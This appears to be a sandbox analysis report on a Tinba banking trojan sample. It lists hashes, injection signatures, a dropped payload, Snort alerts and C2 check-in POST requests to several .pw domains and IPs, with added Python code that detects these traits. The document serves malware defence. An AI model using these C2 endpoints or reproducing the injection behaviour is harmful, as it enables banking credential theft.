

Windows Analysis Report
java.exe

Overview

General Information

Sample name: java.exe
Analysis ID: 1364228
MD5: 0411c0706f66b49aa6bef1528606ee31
SHA1: bdb8cb7a8aa380138ab9220075bb08b03a5edc28
SHA256: 9e6e9d8eabba4b886fa84170137e3a72c35cc7b360a5cba1a08cbc6b6f468a3c
Tags: exe, tinba

Detection

Tinba
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Tinba Banker
Allocates memory in foreign processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Exploit detected, runtime environment starts unknown processes
Hooks files or directories query functions (used to hide files and directories)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • java.exe (PID: 6188 cmdline: C:\Users\user\Desktop\java.exe MD5: 0411C0706F66B49AA6BEF1528606EE31)
    • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • winver.exe (PID: 6384 cmdline: winver MD5: B5471B0FB5402FC318C82C994C6BF84D)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • bin.exe (PID: 6940 cmdline: "C:\Users\user\AppData\Roaming\E38A1E29\bin.exe" MD5: CB95EC2B6EF058D45AA18CD146471002)
          • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bin.exe (PID: 1196 cmdline: "C:\Users\user\AppData\Roaming\E38A1E29\bin.exe" MD5: CB95EC2B6EF058D45AA18CD146471002)
          • conhost.exe (PID: 352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sihost.exe (PID: 3420 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
      • svchost.exe (PID: 3456 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 3528 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • ctfmon.exe (PID: 3832 cmdline: ctfmon.exe MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
      • svchost.exe (PID: 4196 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • StartMenuExperienceHost.exe (PID: 4660 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
      • RuntimeBroker.exe (PID: 4872 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SearchApp.exe (PID: 4984 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
      • RuntimeBroker.exe (PID: 5092 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • smartscreen.exe (PID: 5584 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
      • TextInputHost.exe (PID: 3788 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
      • RuntimeBroker.exe (PID: 5116 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 1532 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • ApplicationFrameHost.exe (PID: 5736 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
      • WinStore.App.exe (PID: 2524 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
      • RuntimeBroker.exe (PID: 1760 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • SystemSettings.exe (PID: 6060 cmdline: "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel MD5: 3CD3CD85226FCF576DFE9B70B6DA2630)
      • UserOOBEBroker.exe (PID: 3924 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
      • svchost.exe (PID: 5040 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • conhost.exe (PID: 3300 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • dllhost.exe (PID: 2912 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • backgroundTaskHost.exe (PID: 6064 cmdline: "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca MD5: DA7063B17DBB8BBB3015351016868006)
      • RuntimeBroker.exe (PID: 4504 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • RuntimeBroker.exe (PID: 6016 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 4852 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 5144 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 4588 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 1260 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 2496 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 4600 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 5356 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 4464 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 2380 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • KIdSIJzxFEgRWLYApSEFvZXik.exe (PID: 2852 cmdline: "C:\Program Files (x86)\znXjjtGilEXQeCITXrhpAkAbipUXsuxVFFPAZzzoVAbegMq\KIdSIJzxFEgRWLYApSEFvZXik.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
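The tree above is the sandbox's own rendering of what ran. As an added example, not code from the Joe Sandbox report, the following Python parses a constructed excerpt of that tree, in the same "image (PID: n cmdline: ... MD5: ...)" form, and flags two things the signature list describes: a payload launched from an eight-hex-character directory under %APPDATA% (the report's E38A1E29\bin.exe) and explorer.exe appearing beneath the sample's own subtree, which is how the sandbox renders the explorer.exe injection. The hex-directory pattern and the excerpt itself are assumptions taken from this one report, not a general Tinba rule.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt of the report's process tree, same layout as the page;
# only a few nodes are kept so the example stays short.
TREE_TEXT = r"""
  • System is w10x64
  • java.exe (PID: 6188 cmdline: C:\Users\user\Desktop\java.exe MD5: 0411C0706F66B49AA6BEF1528606EE31)
    • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • winver.exe (PID: 6384 cmdline: winver MD5: B5471B0FB5402FC318C82C994C6BF84D)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • bin.exe (PID: 6940 cmdline: "C:\Users\user\AppData\Roaming\E38A1E29\bin.exe" MD5: CB95EC2B6EF058D45AA18CD146471002)
          • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sihost.exe (PID: 3420 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
  • cleanup
"""

NODE_RE = re.compile(
    r"^(?P<indent> *)• (?P<image>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmd>.*) MD5: (?P<md5>[0-9A-Fa-f]{32})\)$"
)
# Dropped file run from an 8-hex-character directory under %APPDATA%, the
# pattern of this report's E38A1E29\bin.exe (assumption drawn from this report).
APPDATA_HEX_DIR = re.compile(r"AppData\\Roaming\\[0-9A-Fa-f]{8}\\", re.IGNORECASE)


@dataclass(eq=False)
class Proc:
    image: str
    pid: int
    cmdline: str
    md5: str
    depth: int
    parent: Optional["Proc"] = None
    children: list = field(default_factory=list)


def parse_tree(text):
    """Turn the indented bullet list into Proc objects linked parent<->child."""
    nodes, stack = [], []          # stack holds the open ancestors, deepest last
    for line in text.splitlines():
        m = NODE_RE.match(line)
        if not m:                  # "System is ...", "cleanup" and blank lines
            continue
        node = Proc(m["image"], int(m["pid"]), m["cmd"], m["md5"].upper(), len(m["indent"]) // 2)
        while stack and stack[-1].depth >= node.depth:
            stack.pop()
        if stack:
            node.parent = stack[-1]
            stack[-1].children.append(node)
        stack.append(node)
        nodes.append(node)
    return nodes


def chain(node):
    """Image names from the top of the tree down to `node`."""
    out = []
    while node is not None:
        out.append(node.image)
        node = node.parent
    return out[::-1]


def by_pid(nodes, pid):
    return next(n for n in nodes if n.pid == pid)


def findings(nodes):
    """Flag what the report's signatures describe: a payload dropped under a
    hex-named %APPDATA% directory, and explorer.exe hanging off the sample's
    subtree (explorer is normally a root; here it was an injection target)."""
    sample = next(n for n in nodes if n.parent is None)
    out = []
    for n in nodes:
        if APPDATA_HEX_DIR.search(n.cmdline):
            out.append(("appdata-hex-dir", n.pid, n.image))
        if n.image.lower() == "explorer.exe" and sample.image in chain(n)[:-1]:
            out.append(("explorer-under-sample", n.pid, n.image))
    return out


if __name__ == "__main__":
    procs = parse_tree(TREE_TEXT)
    for f in findings(procs):
        print(f, "<-", " > ".join(chain(by_pid(procs, f[1]))))
```

Run as a script it prints each finding with the full ancestry, e.g. the dropped bin.exe resolves to java.exe > winver.exe > explorer.exe > bin.exe, which is the injection chain the "Injects code into the Windows Explorer" signature summarises.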
Name: Tinba
Description: F-Secure notes that TinyBanker, or Tinba for short, is usually distributed through malvertising (advertising content that leads the user to sites hosting malicious threats), exploit kits and spam email campaigns. According to news reports, Tinba has been found targeting bank customers in the United States and Europe. If Tinba successfully infects a device, it can steal banking and personal information through webinjects. To do this, the malware monitors the user's browser activity and, if specific banking portals are visited, injects code to present the victim with fake web forms designed to mimic the legitimate web site. The malware then tricks them into entering their personal information, log-in credentials, etc. on the legitimate-looking page. Tinba may also display socially engineered messages to lure or pressure the user into entering their information on the fake page; for example, a message may be shown which attempts to convince the victim that funds were accidentally deposited to their account and must be refunded immediately.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba
No configs have been found
Source | Rule | Description | Author
Process Memory Space: java.exe PID: 6188 | JoeSecurity_Tinba | Yara detected Tinba Banker | Joe Security
Process Memory Space: winver.exe PID: 6384 | JoeSecurity_Tinba | Yara detected Tinba Banker | Joe Security
Process Memory Space: explorer.exe PID: 2580 | JoeSecurity_Tinba | Yara detected Tinba Banker | Joe Security
Process Memory Space: sihost.exe PID: 3420 | JoeSecurity_Tinba | Yara detected Tinba Banker | Joe Security
Process Memory Space: svchost.exe PID: 3456 | JoeSecurity_Tinba | Yara detected Tinba Banker | Joe Security
(7 further Yara matches are not expanded in the report)
            No Sigma rule has matched
Snort IDS alerts (all TCP, classtype "A Network Trojan was detected"; rule names as given in the Networking section below):

Timestamp                 Source             Destination          SID      Rule
12/19/23-00:41:33.880543  192.168.2.4:49735  216.218.185.162:80   2020418  ET TROJAN Tinba Checkin 2
12/19/23-00:41:33.880543  192.168.2.4:49735  216.218.185.162:80   2024659  ET TROJAN [PTsecurity] Tinba Checkin 4
12/19/23-00:41:44.628603  192.168.2.4:49736  104.131.68.180:80    2020418  ET TROJAN Tinba Checkin 2
12/19/23-00:41:44.628603  192.168.2.4:49736  104.131.68.180:80    2024659  ET TROJAN [PTsecurity] Tinba Checkin 4
12/19/23-00:41:44.628603  192.168.2.4:49736  104.131.68.180:80    2830613  ETPRO TROJAN W32/Chthonic CnC Activity
12/19/23-00:41:46.120627  192.168.2.4:49737  216.218.185.162:80   2020418  ET TROJAN Tinba Checkin 2
12/19/23-00:41:46.120627  192.168.2.4:49737  216.218.185.162:80   2024659  ET TROJAN [PTsecurity] Tinba Checkin 4
12/19/23-00:41:47.666890  192.168.2.4:49738  216.218.185.162:80   2020418  ET TROJAN Tinba Checkin 2
12/19/23-00:41:47.666890  192.168.2.4:49738  216.218.185.162:80   2024659  ET TROJAN [PTsecurity] Tinba Checkin 4



            AV Detection

Source: java.exe | Avira: detected
Source: http://spaines.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://uyhgqunqkxnx.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://cmnsgscccrej.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: http://vcklmnnejwxx.pw/EiDQjNbWEQ/ | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Avira: detection malicious, Label: HEUR/AGEN.1322420
Source: java.exe | ReversingLabs: Detection: 89%
Source: C:\Users\user\AppData\Roaming\E38A1E29\bin.exe | Joe Sandbox ML: detected
Source: java.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_047E2DCF CryptAcquireContextA, CryptImportPublicKeyInfo, CryptCreateHash, CryptHashData, CryptVerifySignatureA, CryptDestroyHash, CryptDestroyKey, CryptReleaseContext
Source: java.exe | Binary or memory string: -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAldMoUs9Ytg4Z6u+LBejj XsQpi94U2CbOGCF5DieMHxzcr5nhleioQixxAah9IEXJgzZ8Ag69xjMADnuKMumV xOFw6SbeOhRGrT/al5Rv/X56bsKPBBn5UAR5xhzUielXM77Z8R0oKVOKfXYDXdMq hx6FPFOOnV4/H7u3zf0sUbHXjbJEamXSjWRd0O
Source: java.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown | HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: KIdSIJzxFEgRWLYApSEFvZXik.exe, 0000002B.00000002.2969338843.000000000051E000.00000002.00000001.01000000.00000007.sdmp
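The CryptImportPublicKeyInfo / CryptHashData / CryptVerifySignatureA sequence in winver.exe and the PEM block found in java.exe's memory belong together: the code verifies RSA signatures against a public key the sample carries (what it verifies is not shown in this report). The base64 prefix MIICIjAN decodes to the DER bytes 30 82 02 22, a 546-byte SubjectPublicKeyInfo, which is the size of a 4096-bit RSA key. The key on the page is cut short, so the added example below (Python, not code from the report or from the Tinba authors) builds a toy 2048-bit SubjectPublicKeyInfo of its own, plants it in a constructed dump, and shows how to find such keys in a memory image and fingerprint them, which is how samples that carry the same key are grouped. The toy modulus is not a real key, and the DER helpers cover only what an RSA SubjectPublicKeyInfo needs.

```python
import base64
import hashlib
import re

RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")   # 1.2.840.113549.1.1.1


# --- minimal DER helpers (only what SubjectPublicKeyInfo for RSA needs) ---
def _der_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _der(tag, body):
    return bytes([tag]) + _der_len(len(body)) + body


def _der_int(value):
    body = value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")
    if body[0] & 0x80:              # keep the INTEGER positive
        body = b"\x00" + body
    return _der(0x02, body)


def rsa_spki(n, e):
    """Encode (n, e) as the SubjectPublicKeyInfo that sits inside a PEM PUBLIC KEY."""
    rsa_key = _der(0x30, _der_int(n) + _der_int(e))
    alg_id = _der(0x30, _der(0x06, RSA_ENCRYPTION_OID) + b"\x05\x00")
    return _der(0x30, alg_id + _der(0x03, b"\x00" + rsa_key))


def _read_tlv(buf, pos):
    """Return (tag, value, position after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:               # long form: next bytes hold the length
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    return tag, buf[pos:pos + length], pos + length


def rsa_params(spki):
    """Parse SubjectPublicKeyInfo -> (n, e); raises ValueError if it is not RSA."""
    tag, body, _ = _read_tlv(spki, 0)
    if tag != 0x30:
        raise ValueError("not a SEQUENCE")
    tag, alg_id, pos = _read_tlv(body, 0)
    oid_tag, oid, _ = _read_tlv(alg_id, 0)
    if oid_tag != 0x06 or oid != RSA_ENCRYPTION_OID:
        raise ValueError("not rsaEncryption")
    tag, bits, _ = _read_tlv(body, pos)
    if tag != 0x03 or bits[0] != 0:
        raise ValueError("bad BIT STRING")
    _, rsa_key, _ = _read_tlv(bits, 1)          # skip the unused-bits byte
    _, n_bytes, pos = _read_tlv(rsa_key, 0)
    _, e_bytes, _ = _read_tlv(rsa_key, pos)
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


PEM_RE = re.compile(rb"-----BEGIN PUBLIC KEY-----(.*?)-----END PUBLIC KEY-----", re.S)


def extract_public_keys(blob):
    """Scan a memory dump or file for PEM public keys and describe each one."""
    found = []
    for m in PEM_RE.finditer(blob):
        der = base64.b64decode(re.sub(rb"\s+", b"", m.group(1)))
        n, e = rsa_params(der)
        found.append({
            "offset": m.start(),
            "bits": n.bit_length(),
            "e": e,
            "spki_sha256": hashlib.sha256(der).hexdigest(),   # stable per-key fingerprint
        })
    return found


def pem_wrap(der):
    b64 = base64.b64encode(der).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN PUBLIC KEY-----\n" + "\n".join(lines) + "\n-----END PUBLIC KEY-----"


# Constructed "dump": a toy 2048-bit modulus (not a real key) embedded in filler bytes.
TOY_N = (1 << 2047) | 0x10001
TOY_E = 65537
SAMPLE_DUMP = b"\x00" * 64 + pem_wrap(rsa_spki(TOY_N, TOY_E)).encode() + b"\xff" * 64


if __name__ == "__main__":
    for key in extract_public_keys(SAMPLE_DUMP):
        print(key)
```

Feed extract_public_keys() a process memory dump instead of SAMPLE_DUMP to get offset, key size and SPKI hash for every embedded key; the SPKI hash is the value worth pivoting on across samples, since the key changes far less often than the packer or the C2 domains.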

            Software Vulnerabilities

Source: C:\Users\user\Desktop\java.exe | Process created: C:\Windows\System32\conhost.exe

            Networking

Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49735 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49735 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49736 -> 104.131.68.180:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49736 -> 104.131.68.180:80
Source: Traffic | Snort IDS: 2830613 ETPRO TROJAN W32/Chthonic CnC Activity 192.168.2.4:49736 -> 104.131.68.180:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49737 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49737 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2024659 ET TROJAN [PTsecurity] Tinba Checkin 4 192.168.2.4:49738 -> 216.218.185.162:80
Source: Traffic | Snort IDS: 2020418 ET TROJAN Tinba Checkin 2 192.168.2.4:49738 -> 216.218.185.162:80
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: spaines.pw | Content-Length: 157 | Data Raw: 17 df be d8 01 d5 be d8 79 91 65 5a 11 dd bf fb 27 ef 8e e8 27 ef 8e e8 | Data Ascii: yeZ''
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: uyhgqunqkxnx.pw | Content-Length: 157 | Data Raw: df a3 ff f3 c4 a9 ff f3 b1 ed 24 71 d9 a1 fe d0 ef 93 cf c3 ef 93 cf c3 | Data Ascii: $q
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: vcklmnnejwxx.pw | Content-Length: 157 | Data Raw: 44 9d 81 a8 58 97 81 a8 2a d3 5a 2a 42 9f 80 8b 74 ad b1 98 74 ad b1 98 | Data Ascii: DX*Z*Btt
Source: global traffic | HTTP traffic detected: POST /EiDQjNbWEQ/ HTTP/1.0 | Host: cmnsgscccrej.pw | Content-Length: 157 | Data Raw: 38 28 9d 64 25 22 9d 64 56 66 46 e6 3e 2a 9c 47 08 18 ad 54 08 18 ad 54 | Data Ascii: 8(d%"dVfF>*GTT
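The four POSTs above share one path (/EiDQjNbWEQ/), one body length (157 bytes), HTTP/1.0 and no User-Agent, spread over four .pw hosts; the report's "HTTP GET or POST without a user agent" signature fires on exactly that, and the Snort "Tinba Checkin" rules key on the same traffic. As an added example, not code from the report, the following Python runs that logic over constructed request heads (the four check-ins as listed above, the sandbox's own Cortana/Bing request, and a benign GET), flags each request and clusters POSTs that repeat the same path and body length across several hosts. The min_hosts threshold, the trimmed Cortana headers and the benign GET are assumptions.

```python
import re
from collections import defaultdict

# Constructed request heads. The first four mirror the check-ins the report
# lists (same path, same 157-byte body, HTTP/1.0, no User-Agent, four hosts);
# the last two are contrast cases. Bodies are omitted; only heads matter here.
REQUESTS = [
    "POST /EiDQjNbWEQ/ HTTP/1.0\r\nHost: spaines.pw\r\nContent-Length: 157\r\n\r\n",
    "POST /EiDQjNbWEQ/ HTTP/1.0\r\nHost: uyhgqunqkxnx.pw\r\nContent-Length: 157\r\n\r\n",
    "POST /EiDQjNbWEQ/ HTTP/1.0\r\nHost: vcklmnnejwxx.pw\r\nContent-Length: 157\r\n\r\n",
    "POST /EiDQjNbWEQ/ HTTP/1.0\r\nHost: cmnsgscccrej.pw\r\nContent-Length: 157\r\n\r\n",
    "POST /threshold/xls.aspx HTTP/1.1\r\nHost: www.bing.com\r\nContent-type: text/xml\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041)\r\n"
    "Content-Length: 2232\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: example.org\r\nUser-Agent: curl/8.4.0\r\n\r\n",
]


def parse_request(raw):
    """Split an HTTP request head into method/target/version and a header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()   # header names are case-insensitive
    return {"method": method, "path": target, "version": version, "headers": headers}


def request_flags(req):
    """Per-request oddities matching the report's signatures."""
    flags, h = [], req["headers"]
    if "user-agent" not in h:
        flags.append("no-user-agent")           # "HTTP GET or POST without a user agent"
    if req["version"] == "HTTP/1.0":
        flags.append("http-1.0")                # no current browser speaks 1.0
    if req["method"] == "POST" and "content-type" not in h:
        flags.append("post-without-content-type")
    return flags


def beacon_clusters(reqs, min_hosts=3):
    """Group POSTs by (path, body length); one group spread over several hosts
    is the rotating-domain check-in pattern seen above."""
    hosts_by_key = defaultdict(set)
    for r in reqs:
        if r["method"] == "POST":
            key = (r["path"], r["headers"].get("content-length"))
            hosts_by_key[key].add(r["headers"].get("host", ""))
    return {k: sorted(v) for k, v in hosts_by_key.items() if len(v) >= min_hosts}


def analyse(raw_requests):
    reqs = [parse_request(r) for r in raw_requests]
    per_request = [(r["headers"].get("host"), request_flags(r)) for r in reqs]
    return per_request, beacon_clusters(reqs)


if __name__ == "__main__":
    per_request, clusters = analyse(REQUESTS)
    for host, flags in per_request:
        if flags:
            print(host, flags)
    for (path, length), hosts in clusters.items():
        print(f"beacon cluster: POST {path} ({length} bytes) to {len(hosts)} hosts: {hosts}")
```

The per-request flags alone would also hit old scripts and embedded devices; the host-spread cluster on a fixed path and body length is the part that separates this traffic from ordinary HTTP/1.0 noise, so alert on the cluster and use the flags as supporting evidence.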
Source: Joe Sandbox View | IP Address: 216.218.185.162
Source: Joe Sandbox View | ASN Name: HURRICANEUS
Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: global traffic | HTTP traffic detected:
POST /threshold/xls.aspx HTTP/1.1
Origin: https://www.bing.com
Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
Accept: */*
Accept-Language: en-CH
Content-type: text/xml
X-Agent-DeviceId: 01000A4109000CC6
X-BM-CBT: 1696420817
X-BM-DateFormat: dd/MM/yyyy
X-BM-DeviceDimensions: 784x984
X-BM-DeviceDimensionsLogical: 784x984
X-BM-DeviceScale: 100
X-BM-DTZ: 60
X-BM-Market: CH
X-BM-Theme: 000000;0078d7
